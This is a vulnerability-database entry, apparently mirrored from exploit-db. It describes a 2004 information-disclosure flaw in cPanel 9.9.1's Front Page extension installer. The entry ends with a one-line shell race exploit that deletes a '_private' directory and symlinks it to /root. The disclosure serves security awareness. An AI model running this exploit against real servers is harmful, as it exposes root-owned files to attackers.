cPanel 9.9.1 -R3 Front Page Extension - Installation Information Disclosure

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054718 漏洞类型
发布时间 2004-10-18 更新时间 2004-10-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24689
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11456/info

It is reported that cPanel is susceptible to an information disclosure vulnerability in its function to enable Front Page extensions.

This vulnerability reportedly allows attackers to gain access to the contents of arbitrary, potentially sensitive files. This may aid them in further attacks.

Version 9.9.1-RELEASE-3 of cPanel was reported vulnerable. Other versions may also be affected.

while [ 1 ]; do if [ -d "_private" ]; then rm -fr _private; ln -s /root _private; break; fi; done